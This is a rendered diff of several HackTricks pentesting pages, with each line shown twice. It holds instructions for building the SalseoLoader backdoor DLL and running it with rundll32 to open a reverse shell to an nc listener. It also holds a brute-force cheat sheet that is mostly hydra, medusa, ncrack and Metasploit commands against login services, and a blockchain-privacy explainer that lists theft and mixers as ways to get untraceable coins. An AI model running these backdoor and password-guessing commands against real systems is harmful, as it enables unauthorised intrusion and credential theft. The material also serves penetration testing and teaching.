Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library) Select **Output Type = Class Library** (Project --> SalseoLoader Properties --> Application --> Output type = Class Library)
@ -154,7 +152,7 @@ Select **x64** **platform** (Project --> SalseoLoader Properties --> Build --> P
To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear) To **build** the solution: Build --> Build Solution (Inside the Output console the path of the new DLL will appear)
### Test the generated Dll ## Test the generated Dll
Copy and paste the Dll where you want to test it. Copy and paste the Dll where you want to test it.
@ -166,11 +164,11 @@ rundll32.exe SalseoLoader.dll,main
If not error appears, probably you have a functional dll!! If not error appears, probably you have a functional dll!!
## Get a shell using the Dll # Get a shell using the Dll
Don't forget to use a **HTTP** **server** and set a **nc** **listener** Don't forget to use a **HTTP** **server** and set a **nc** **listener**
### Powershell ## Powershell
``` ```
$env:pass="password" $env:pass="password"
@ -181,7 +179,7 @@ $env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main rundll32.exe SalseoLoader.dll,main
``` ```
### CMD ## CMD
``` ```
set pass=password set pass=password

View file

@ -17,9 +17,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Blockchain & Crypto Currencies # Basic Terminology
## Basic Terminology
* **Smart contract**: Smart contracts are simply **programs stored on a blockchain that run when predetermined conditions are met**. They typically are used to automate the **execution** of an **agreement** so that all participants can be immediately certain of the outcome, without any intermediarys involvement or time loss. (From [here](https://www.ibm.com/topics/smart-contracts)). * **Smart contract**: Smart contracts are simply **programs stored on a blockchain that run when predetermined conditions are met**. They typically are used to automate the **execution** of an **agreement** so that all participants can be immediately certain of the outcome, without any intermediarys involvement or time loss. (From [here](https://www.ibm.com/topics/smart-contracts)).
* Basically, a smart contract is a **piece of code** that is going to be executed when people access and accept the contract. Smart contracts **run in blockchains** (so the results are stored inmutable) and can be read by the people before accepting them. * Basically, a smart contract is a **piece of code** that is going to be executed when people access and accept the contract. Smart contracts **run in blockchains** (so the results are stored inmutable) and can be read by the people before accepting them.
@ -31,26 +29,26 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **DEX: Decentralized Exchange Platforms**. * **DEX: Decentralized Exchange Platforms**.
* **DAOs**: **Decentralized Autonomous Organizations**. * **DAOs**: **Decentralized Autonomous Organizations**.
## Consensus Mechanisms # Consensus Mechanisms
For a blockchain transaction to be recognized, it must be **appended** to the **blockchain**. Validators (miners) carry out this appending; in most protocols, they **receive a reward** for doing so. For the blockchain to remain secure, it must have a mechanism to **prevent a malicious user or group from taking over a majority of validation**. For a blockchain transaction to be recognized, it must be **appended** to the **blockchain**. Validators (miners) carry out this appending; in most protocols, they **receive a reward** for doing so. For the blockchain to remain secure, it must have a mechanism to **prevent a malicious user or group from taking over a majority of validation**.
Proof of work, another commonly used consensus mechanism, uses a validation of computational prowess to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network. Proof of work, another commonly used consensus mechanism, uses a validation of computational prowess to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.
### Proof Of Work (PoW) ## Proof Of Work (PoW)
This uses a **validation of computational prowess** to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.\ This uses a **validation of computational prowess** to verify transactions, requiring a potential attacker to acquire a large fraction of the computational power of the validator network.\
The **miners** will **select several transactions** and then start **computing the Proof Of Work**. The **miner with the greatest computation resources** is more probably to **finish** **earlier** the Proof of Work and get the fees of all the transactions. The **miners** will **select several transactions** and then start **computing the Proof Of Work**. The **miner with the greatest computation resources** is more probably to **finish** **earlier** the Proof of Work and get the fees of all the transactions.
### Proof Of Stake (PoS) ## Proof Of Stake (PoS)
PoS accomplishes this by **requiring that validators have some quantity of blockchain tokens**, requiring **potential attackers to acquire a large fraction of the tokens** on the blockchain to mount an attack.\ PoS accomplishes this by **requiring that validators have some quantity of blockchain tokens**, requiring **potential attackers to acquire a large fraction of the tokens** on the blockchain to mount an attack.\
In this kind of consensus, the more tokens a miner has, the more probably it will be that the miner will be asked to create the next block.\ In this kind of consensus, the more tokens a miner has, the more probably it will be that the miner will be asked to create the next block.\
Compared with PoW, this greatly **reduced the energy consumption** the miners are expending. Compared with PoW, this greatly **reduced the energy consumption** the miners are expending.
## Bitcoin # Bitcoin
### Transactions ## Transactions
A simple **transaction** is a **movement of money** from an address to another one.\ A simple **transaction** is a **movement of money** from an address to another one.\
An **address** in bitcoin is the hash of the **public** **key**, therefore, someone in order to make a transaction from an address he needs to know the private key associated to that public key (the address).\ An **address** in bitcoin is the hash of the **public** **key**, therefore, someone in order to make a transaction from an address he needs to know the private key associated to that public key (the address).\
@ -79,11 +77,11 @@ Once R and S have been calculated, they are serialized into a byte stream that i
Verification of a signature effectively means that only the owner of the private key (that generated the public key) could have produced the signature on the transaction. The signature verification algorithm will return TRUE if the signature is indeed valid. Verification of a signature effectively means that only the owner of the private key (that generated the public key) could have produced the signature on the transaction. The signature verification algorithm will return TRUE if the signature is indeed valid.
#### Multisignature Transactions ### Multisignature Transactions
A multi-signature **address** is an address that is associated with more than one ECDSA private key. The simplest type is an m-of-n address - it is associated with n private keys, and sending bitcoins from this address requires signatures from at least m keys. A multi-signature **transaction** is one that sends funds from a multi-signature address. A multi-signature **address** is an address that is associated with more than one ECDSA private key. The simplest type is an m-of-n address - it is associated with n private keys, and sending bitcoins from this address requires signatures from at least m keys. A multi-signature **transaction** is one that sends funds from a multi-signature address.
#### Transactions Fields ### Transactions Fields
Each bitcoin transaction has several fields: Each bitcoin transaction has several fields:
@ -98,7 +96,7 @@ There are **2 main types** of transactions:
* **P2PKH: "Pay To Public Key Hash"**: This is how transactions are made. You are requiring the **sender** to supply a valid **signature** (from the private key) and **public** **key**. The transaction output script will use the signature and public key and through some cryptographic functions will check **if it matches** with the public key hash, if it does, then the **funds** will be **spendable**. This method conceals your public key in the form of a hash for extra security. * **P2PKH: "Pay To Public Key Hash"**: This is how transactions are made. You are requiring the **sender** to supply a valid **signature** (from the private key) and **public** **key**. The transaction output script will use the signature and public key and through some cryptographic functions will check **if it matches** with the public key hash, if it does, then the **funds** will be **spendable**. This method conceals your public key in the form of a hash for extra security.
* **P2SH: "Pay To Script Hash":** The outputs of a transaction are just **scripts** (this means the person how want this money send a script) that, if are **executed with specific parameters, will result in a boolean of `true` or `false`**. If a miner runs the output script with the supplied parameters and results in `true`, the **money will be sent to your desired output**. `P2SH` is used for **multi-signature** wallets making the output scripts **logic that checks for multiple signatures before accepting the transaction**. `P2SH` can also be used to allow anyone, or no one, to spend the funds. If the output script of a P2SH transaction is just `1` for true, then attempting to spend the output without supplying parameters will just result in `1` making the money spendable by anyone who tries. This also applies to scripts that return `0`, making the output spendable by no one. * **P2SH: "Pay To Script Hash":** The outputs of a transaction are just **scripts** (this means the person how want this money send a script) that, if are **executed with specific parameters, will result in a boolean of `true` or `false`**. If a miner runs the output script with the supplied parameters and results in `true`, the **money will be sent to your desired output**. `P2SH` is used for **multi-signature** wallets making the output scripts **logic that checks for multiple signatures before accepting the transaction**. `P2SH` can also be used to allow anyone, or no one, to spend the funds. If the output script of a P2SH transaction is just `1` for true, then attempting to spend the output without supplying parameters will just result in `1` making the money spendable by anyone who tries. This also applies to scripts that return `0`, making the output spendable by no one.
### Lightning Network ## Lightning Network
This protocol helps to **perform several transactions to a channe**l and **just** **sent** the **final** **state** to the blockchain to save it.\ This protocol helps to **perform several transactions to a channe**l and **just** **sent** the **final** **state** to the blockchain to save it.\
This **improves** bitcoin blockchain **speed** (it just on allow 7 payments per second) and it allows to create **transactions more difficult to trace** as the channel is created via nodes of the bitcoin blockchain: This **improves** bitcoin blockchain **speed** (it just on allow 7 payments per second) and it allows to create **transactions more difficult to trace** as the channel is created via nodes of the bitcoin blockchain:
@ -109,27 +107,27 @@ Normal use of the Lightning Network consists of **opening a payment channel** by
Note that any of the both members of the channel can stop and send the final state of the channel to the blockchain at any time. Note that any of the both members of the channel can stop and send the final state of the channel to the blockchain at any time.
## Bitcoin Privacy Attacks # Bitcoin Privacy Attacks
### Common Input ## Common Input
Theoretically the inputs of one transaction can belong to different users, but in reality that is unusual as it requires extra steps. Therefore, very often it can be assumed that **2 input addresses in the same transaction belongs to the same owner**. Theoretically the inputs of one transaction can belong to different users, but in reality that is unusual as it requires extra steps. Therefore, very often it can be assumed that **2 input addresses in the same transaction belongs to the same owner**.
### UTXO Change Address Detection ## UTXO Change Address Detection
**UTXO** means **Unspent Transaction Outputs** (UTXOs). In a transaction that uses the output from a previous transaction as an input, the **whole output need to be spent** (to avoid double-spend attacks). Therefore, if the intention was to **send** just **part** of the money from that output to an address and **keep** the **other** **part**, **2 different outputs** will appear: the **intended** one and a **random new change address** where the rest of the money will be saved. **UTXO** means **Unspent Transaction Outputs** (UTXOs). In a transaction that uses the output from a previous transaction as an input, the **whole output need to be spent** (to avoid double-spend attacks). Therefore, if the intention was to **send** just **part** of the money from that output to an address and **keep** the **other** **part**, **2 different outputs** will appear: the **intended** one and a **random new change address** where the rest of the money will be saved.
Then, a watcher can make the assumption that **the new change address generated belong to the owner of the UTXO**. Then, a watcher can make the assumption that **the new change address generated belong to the owner of the UTXO**.
### Social Networks & Forums ## Social Networks & Forums
Some people gives data about theirs bitcoin addresses in different webs on Internet. **This make pretty easy to identify the owner of an address**. Some people gives data about theirs bitcoin addresses in different webs on Internet. **This make pretty easy to identify the owner of an address**.
### Transaction Graphs ## Transaction Graphs
By representing the transactions in graphs, i**t's possible to know with certain probability to where the money of an account were**. Therefore, it's possible to know something about **users** that are **related** in the blockchain. By representing the transactions in graphs, i**t's possible to know with certain probability to where the money of an account were**. Therefore, it's possible to know something about **users** that are **related** in the blockchain.
### **Unnecessary input heuristic** ## **Unnecessary input heuristic**
Also called the "optimal change heuristic". Consider this bitcoin transaction. It has two inputs worth 2 BTC and 3 BTC and two outputs worth 4 BTC and 1 BTC. Also called the "optimal change heuristic". Consider this bitcoin transaction. It has two inputs worth 2 BTC and 3 BTC and two outputs worth 4 BTC and 1 BTC.
@ -148,7 +146,7 @@ This is an issue for transactions which have more than one input. One way to fix
5 btc 5 btc
``` ```
### Forced address reuse ## Forced address reuse
**Forced address reuse** or **incentivized address reuse** is when an adversary pays an (often small) amount of bitcoin to addresses that have already been used on the block chain. The adversary hopes that users or their wallet software **will use the payments as inputs to a larger transaction which will reveal other addresses via the the common-input-ownership** heuristic. These payments can be understood as a way to coerce the address owner into unintentional address reuse. **Forced address reuse** or **incentivized address reuse** is when an adversary pays an (often small) amount of bitcoin to addresses that have already been used on the block chain. The adversary hopes that users or their wallet software **will use the payments as inputs to a larger transaction which will reveal other addresses via the the common-input-ownership** heuristic. These payments can be understood as a way to coerce the address owner into unintentional address reuse.
@ -156,14 +154,14 @@ This attack is sometimes incorrectly called a **dust attack**.
The correct behaviour by wallets is to not spend coins that have landed on an already-used empty addresses. The correct behaviour by wallets is to not spend coins that have landed on an already-used empty addresses.
### Other Blockchain Analysis ## Other Blockchain Analysis
* **Exact Payment Amounts**: In order to avoid transactions with a change, the payment needs to be equal to the UTXO (which is highly unexpected). Therefore, a **transaction with no change address are probably transfer between 2 addresses of the same user**. * **Exact Payment Amounts**: In order to avoid transactions with a change, the payment needs to be equal to the UTXO (which is highly unexpected). Therefore, a **transaction with no change address are probably transfer between 2 addresses of the same user**.
* **Round Numbers**: In a transaction, if one of the outputs is a "**round number**", it's highly probable that this is a **payment to a human that put that** "round number" **price**, so the other part must be the leftover. * **Round Numbers**: In a transaction, if one of the outputs is a "**round number**", it's highly probable that this is a **payment to a human that put that** "round number" **price**, so the other part must be the leftover.
* **Wallet fingerprinting:** A careful analyst sometimes deduce which software created a certain transaction, because the many **different wallet softwares don't always create transactions in exactly the same way**. Wallet fingerprinting can be used to detect change outputs because a change output is the one spent with the same wallet fingerprint. * **Wallet fingerprinting:** A careful analyst sometimes deduce which software created a certain transaction, because the many **different wallet softwares don't always create transactions in exactly the same way**. Wallet fingerprinting can be used to detect change outputs because a change output is the one spent with the same wallet fingerprint.
* **Amount & Timing correlations**: If the person that performed the transaction **discloses** the **time** and/or **amount** of the transaction, it can be easily **discoverable**. * **Amount & Timing correlations**: If the person that performed the transaction **discloses** the **time** and/or **amount** of the transaction, it can be easily **discoverable**.
### Traffic analysis ## Traffic analysis
Some organisation **sniffing your traffic** can see you communicating in the bitcoin network.\ Some organisation **sniffing your traffic** can see you communicating in the bitcoin network.\
If the adversary sees a transaction or block **coming out of your node which did not previously enter**, then it can know with near-certainty that **the transaction was made by you or the block was mined by you**. As internet connections are involved, the adversary will be able to **link the IP address with the discovered bitcoin information**. If the adversary sees a transaction or block **coming out of your node which did not previously enter**, then it can know with near-certainty that **the transaction was made by you or the block was mined by you**. As internet connections are involved, the adversary will be able to **link the IP address with the discovered bitcoin information**.
@ -171,27 +169,27 @@ If the adversary sees a transaction or block **coming out of your node which did
An attacker that isn't able to sniff all the Internet traffic but that has **a lot of Bitcoin nodes** in order to stay **closer** to the s**o**urces could be able to know the IP address that are announcing transactions or blocks.\ An attacker that isn't able to sniff all the Internet traffic but that has **a lot of Bitcoin nodes** in order to stay **closer** to the s**o**urces could be able to know the IP address that are announcing transactions or blocks.\
Also, some wallets periodically rebroadcast their unconfirmed transactions so that they are more likely to propagate widely through the network and be mined. Also, some wallets periodically rebroadcast their unconfirmed transactions so that they are more likely to propagate widely through the network and be mined.
### Other attacks to find info about the owner of addresses ## Other attacks to find info about the owner of addresses
For more attacks read [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy) For more attacks read [https://en.bitcoin.it/wiki/Privacy](https://en.bitcoin.it/wiki/Privacy)
## Anonymous Bitcoins # Anonymous Bitcoins
### Obtaining Bitcoins Anonymously ## Obtaining Bitcoins Anonymously
* **Cash trades:** Buy bitcoin using cash. * **Cash trades:** Buy bitcoin using cash.
* **Cash substitute:** Buy gift cards or similar and exchange them for bitcoin online. * **Cash substitute:** Buy gift cards or similar and exchange them for bitcoin online.
* **Mining:** Mining is the most anonymous way to obtain bitcoin. This applies to solo-mining as [mining pools](https://en.bitcoin.it/wiki/Pooled\_mining) generally know the hasher's IP address. * **Mining:** Mining is the most anonymous way to obtain bitcoin. This applies to solo-mining as [mining pools](https://en.bitcoin.it/wiki/Pooled\_mining) generally know the hasher's IP address.
* **Stealing:** In theory another way of obtaining anonymous bitcoin is to steal them. * **Stealing:** In theory another way of obtaining anonymous bitcoin is to steal them.
### Mixers ## Mixers
A user would **send bitcoins to a mixing service** and the service would **send different bitcoins back to the user**, minus a fee. In theory an adversary observing the blockchain would be **unable to link** the incoming and outgoing transactions. A user would **send bitcoins to a mixing service** and the service would **send different bitcoins back to the user**, minus a fee. In theory an adversary observing the blockchain would be **unable to link** the incoming and outgoing transactions.
However, the user needs to trust the mixing service to return the bitcoin and also to not be saving logs about the relations between the money received and sent.\ However, the user needs to trust the mixing service to return the bitcoin and also to not be saving logs about the relations between the money received and sent.\
Some other services can be also used as mixers, like Bitcoin casinos where you can send bitcoins and retrieve them later. Some other services can be also used as mixers, like Bitcoin casinos where you can send bitcoins and retrieve them later.
### CoinJoin ## CoinJoin
**CoinJoin** will **mix several transactions of different users into just one** in order to make more **difficult** for an observer to find out **which input is related to which output**.\ **CoinJoin** will **mix several transactions of different users into just one** in order to make more **difficult** for an observer to find out **which input is related to which output**.\
This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer. This offers a new level of privacy, however, **some** **transactions** where some input and output amounts are correlated or are very different from the rest of the inputs and outputs **can still be correlated** by the external observer.
@ -201,7 +199,7 @@ Examples of (likely) CoinJoin transactions IDs on bitcoin's blockchain are `402d
[**https://coinjoin.io/en**](https://coinjoin.io/en)\ [**https://coinjoin.io/en**](https://coinjoin.io/en)\
**Similar to coinjoin but better and for ethereum you have** [**Tornado Cash**](https://tornado.cash) **(the money is given from miners, so it jus appear in your waller).** **Similar to coinjoin but better and for ethereum you have** [**Tornado Cash**](https://tornado.cash) **(the money is given from miners, so it jus appear in your waller).**
### PayJoin ## PayJoin
The type of CoinJoin discussed in the previous section can be easily identified as such by checking for the multiple outputs with the same value. The type of CoinJoin discussed in the previous section can be easily identified as such by checking for the multiple outputs with the same value.
@ -216,42 +214,42 @@ It could be interpreted as a simple transaction paying to somewhere with leftove
If PayJoin transactions became even moderately used then it would make the **common-input-ownership heuristic be completely flawed in practice**. As they are undetectable we wouldn't even know whether they are being used today. As transaction surveillance companies mostly depend on that heuristic, as of 2019 there is great excitement about the PayJoin idea. If PayJoin transactions became even moderately used then it would make the **common-input-ownership heuristic be completely flawed in practice**. As they are undetectable we wouldn't even know whether they are being used today. As transaction surveillance companies mostly depend on that heuristic, as of 2019 there is great excitement about the PayJoin idea.
## Bitcoin Privacy Good Practices # Bitcoin Privacy Good Practices
### Wallet Synchronization ## Wallet Synchronization
Bitcoin wallets must somehow obtain information about their balance and history. As of late-2018 the most practical and private existing solutions are to use a **full node wallet** (which is maximally private) and **client-side block filtering** (which is very good). Bitcoin wallets must somehow obtain information about their balance and history. As of late-2018 the most practical and private existing solutions are to use a **full node wallet** (which is maximally private) and **client-side block filtering** (which is very good).
* **Full node:** Full nodes download the entire blockchain which contains every on-chain [transaction](https://en.bitcoin.it/wiki/Transaction) that has ever happened in bitcoin. So an adversary watching the user's internet connection will not be able to learn which transactions or addresses the user is interested in. * **Full node:** Full nodes download the entire blockchain which contains every on-chain [transaction](https://en.bitcoin.it/wiki/Transaction) that has ever happened in bitcoin. So an adversary watching the user's internet connection will not be able to learn which transactions or addresses the user is interested in.
* **Client-side block filtering:** Client-side block filtering works by having **filters** created that contains all the **addresses** for every transaction in a block. The filters can test whether an **element is in the set**; false positives are possible but not false negatives. A lightweight wallet would **download** all the filters for every **block** in the **blockchain** and check for matches with its **own** **addresses**. Blocks which contain matches would be downloaded in full from the peer-to-peer network, and those blocks would be used to obtain the wallet's history and current balance. * **Client-side block filtering:** Client-side block filtering works by having **filters** created that contains all the **addresses** for every transaction in a block. The filters can test whether an **element is in the set**; false positives are possible but not false negatives. A lightweight wallet would **download** all the filters for every **block** in the **blockchain** and check for matches with its **own** **addresses**. Blocks which contain matches would be downloaded in full from the peer-to-peer network, and those blocks would be used to obtain the wallet's history and current balance.
### Tor ## Tor
Bitcoin network uses a peer-to-peer network, which means that other peers can learn your IP address. This is why it's recommend to **connect through Tor every time you want to interact with the bitcoin network**. Bitcoin network uses a peer-to-peer network, which means that other peers can learn your IP address. This is why it's recommend to **connect through Tor every time you want to interact with the bitcoin network**.
### Avoiding address reuse ## Avoiding address reuse
**Addresses being used more than once is very damaging to privacy because that links together more blockchain transactions with proof that they were created by the same entity**. The most private and secure way to use bitcoin is to send a brand **new address to each person who pays you**. After the received coins have been spent the address should never be used again. Also, a brand new bitcoin address should be demanded when sending bitcoin. All good bitcoin wallets have a user interface which discourages address reuse. **Addresses being used more than once is very damaging to privacy because that links together more blockchain transactions with proof that they were created by the same entity**. The most private and secure way to use bitcoin is to send a brand **new address to each person who pays you**. After the received coins have been spent the address should never be used again. Also, a brand new bitcoin address should be demanded when sending bitcoin. All good bitcoin wallets have a user interface which discourages address reuse.
### Multiple transactions ## Multiple transactions
**Paying** someone with **more than one on-chain transaction** can greatly reduce the power of amount-based privacy attacks such as amount correlation and round numbers. For example, if the user wants to pay 5 BTC to somebody and they don't want the 5 BTC value to be easily searched for, then they can send two transactions for the value of 2 BTC and 3 BTC which together add up to 5 BTC. **Paying** someone with **more than one on-chain transaction** can greatly reduce the power of amount-based privacy attacks such as amount correlation and round numbers. For example, if the user wants to pay 5 BTC to somebody and they don't want the 5 BTC value to be easily searched for, then they can send two transactions for the value of 2 BTC and 3 BTC which together add up to 5 BTC.
### Change avoidance ## Change avoidance
Change avoidance is where transaction inputs and outputs are carefully chosen to not require a change output at all. **Not having a change output is excellent for privacy**, as it breaks change detection heuristics. Change avoidance is where transaction inputs and outputs are carefully chosen to not require a change output at all. **Not having a change output is excellent for privacy**, as it breaks change detection heuristics.
### Multiple change outputs ## Multiple change outputs
If change avoidance is not an option then **creating more than one change output can improve privacy**. This also breaks change detection heuristics which usually assume there is only a single change output. As this method uses more block space than usual, change avoidance is preferable. If change avoidance is not an option then **creating more than one change output can improve privacy**. This also breaks change detection heuristics which usually assume there is only a single change output. As this method uses more block space than usual, change avoidance is preferable.
## Monero # Monero
When Monero was developed, the gaping need for **complete anonymity** was what it sought to resolve, and to a large extent, it has filled that void. When Monero was developed, the gaping need for **complete anonymity** was what it sought to resolve, and to a large extent, it has filled that void.
## Ethereum # Ethereum
### Gas ## Gas
Gas refers to the unit that measures the **amount** of **computational** **effort** required to execute specific operations on the Ethereum network. Gas refers to the **fee** required to successfully conduct a **transaction** on Ethereum. Gas refers to the unit that measures the **amount** of **computational** **effort** required to execute specific operations on the Ethereum network. Gas refers to the **fee** required to successfully conduct a **transaction** on Ethereum.
@ -269,7 +267,7 @@ Additionally, Jordan can also set a max fee (`maxFeePerGas`) for the transaction
As the base fee is calculated by the network based on demand for block space, this last param: maxFeePerGas helps to control the maximum fee that is going to be payed. As the base fee is calculated by the network based on demand for block space, this last param: maxFeePerGas helps to control the maximum fee that is going to be payed.
### Transactions ## Transactions
Notice that in the **Ethereum** network a transaction is performed between 2 addresses and these can be **user or smart contract addresses**.\ Notice that in the **Ethereum** network a transaction is performed between 2 addresses and these can be **user or smart contract addresses**.\
**Smart Contracts** are stored in the distributed ledger via a **special** **transaction**. **Smart Contracts** are stored in the distributed ledger via a **special** **transaction**.
@ -289,7 +287,7 @@ A submitted transaction includes the following information:
Note that there isn't any field for the origin address, this is because this can be extrapolated from the signature. Note that there isn't any field for the origin address, this is because this can be extrapolated from the signature.
## References # References
* [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake) * [https://en.wikipedia.org/wiki/Proof\_of\_stake](https://en.wikipedia.org/wiki/Proof\_of\_stake)
* [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/) * [https://www.mycryptopedia.com/public-key-private-key-explained/](https://www.mycryptopedia.com/public-key-private-key-explained/)

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Page 1
<details> <details>

View file

@ -17,8 +17,6 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
</details> </details>
# Brute Force - CheatSheet
{% hint style="warning" %} {% hint style="warning" %}
**Support HackTricks and get benefits!** **Support HackTricks and get benefits!**
@ -34,7 +32,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** **Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
{% endhint %} {% endhint %}
## Default Credentials # Default Credentials
**Search in google** for default credentials of the technology that is being used, or **try this links**: **Search in google** for default credentials of the technology that is being used, or **try this links**:
@ -50,11 +48,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com) * [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
* [**https://many-passwords.github.io/**](https://many-passwords.github.io) * [**https://many-passwords.github.io/**](https://many-passwords.github.io)
## **Create your own Dictionaries** # **Create your own Dictionaries**
Find as much information about the target as you can and generate a custom dictionary. Tools that may help: Find as much information about the target as you can and generate a custom dictionary. Tools that may help:
### Crunch ## Crunch
```bash ```bash
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
@ -67,13 +65,13 @@ crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using chars
crunch 6 8 -t ,@@^^%% crunch 6 8 -t ,@@^^%%
``` ```
### Cewl ## Cewl
```bash ```bash
cewl example.com -m 5 -w words.txt cewl example.com -m 5 -w words.txt
``` ```
### [CUPP](https://github.com/Mebus/cupp) ## [CUPP](https://github.com/Mebus/cupp)
Generate passwords based on your knowledge of the victim (names, dates...) Generate passwords based on your knowledge of the victim (names, dates...)
@ -81,9 +79,9 @@ Generate passwords based on your knowledge of the victim (names, dates...)
python3 cupp.py -h python3 cupp.py -h
``` ```
### [pydictor](https://github.com/LandGrey/pydictor) ## [pydictor](https://github.com/LandGrey/pydictor)
### Wordlists ## Wordlists
* [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists) * [**https://github.com/danielmiessler/SecLists**](https://github.com/danielmiessler/SecLists)
* [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium) * [**https://github.com/Dormidera/WordList-Compendium**](https://github.com/Dormidera/WordList-Compendium)
@ -91,11 +89,11 @@ python3 cupp.py -h
* [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md) * [**https://github.com/google/fuzzing/tree/master/dictionaries**](https://github.com/carlospolop/hacktricks/tree/95b16dc7eb952272459fc877e4c9d0777d746a16/google/fuzzing/tree/master/dictionaries/README.md)
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm) * [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm**](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm)
## Services # Services
Ordered alphabetically by service name. Ordered alphabetically by service name.
### AFP ## AFP
```bash ```bash
nmap -p 548 --script afp-brute <IP> nmap -p 548 --script afp-brute <IP>
@ -107,38 +105,38 @@ msf> set USER_FILE <PATH_USERS>
msf> run msf> run
``` ```
### AJP ## AJP
```bash ```bash
nmap --script ajp-brute -p 8009 <IP> nmap --script ajp-brute -p 8009 <IP>
``` ```
### Cassandra ## Cassandra
```bash ```bash
nmap --script cassandra-brute -p 9160 <IP> nmap --script cassandra-brute -p 9160 <IP>
``` ```
### CouchDB ## CouchDB
```bash ```bash
msf> use auxiliary/scanner/couchdb/couchdb_login msf> use auxiliary/scanner/couchdb/couchdb_login
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get / hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
``` ```
### Docker Registry ## Docker Registry
``` ```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
``` ```
### Elasticsearch ## Elasticsearch
``` ```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get / hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
``` ```
### FTP ## FTP
```bash ```bash
hydra -l root -P passwords.txt [-t 32] <IP> ftp hydra -l root -P passwords.txt [-t 32] <IP> ftp
@ -146,11 +144,11 @@ ncrack -p 21 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp medusa -u root -P 500-worst-passwords.txt -h <IP> -M ftp
``` ```
### HTTP Generic Brute ## HTTP Generic Brute
#### [**WFuzz**](pentesting-web/web-tool-wfuzz.md) ### [**WFuzz**](pentesting-web/web-tool-wfuzz.md)
### HTTP Basic Auth ## HTTP Basic Auth
```bash ```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
@ -158,7 +156,7 @@ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordl
medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10 medusa -h <IP> -u <username> -P <passwords.txt> -M http -m DIR:/path/to/auth -T 10
``` ```
### HTTP - Post Form ## HTTP - Post Form
```bash ```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^&password=^PASS^&enter=Sign+in:Login name or password is incorrect" -V
@ -167,13 +165,13 @@ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordl
For http**s** you have to change from "http-post-form" to "**https-post-form"** For http**s** you have to change from "http-post-form" to "**https-post-form"**
### **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle ## **HTTP - CMS --** (W)ordpress, (J)oomla or (D)rupal or (M)oodle
```bash ```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com cmsmap -f W/J/D/M -u a -p a https://wordpress.com
``` ```
### IMAP ## IMAP
```bash ```bash
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
@ -181,19 +179,19 @@ hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
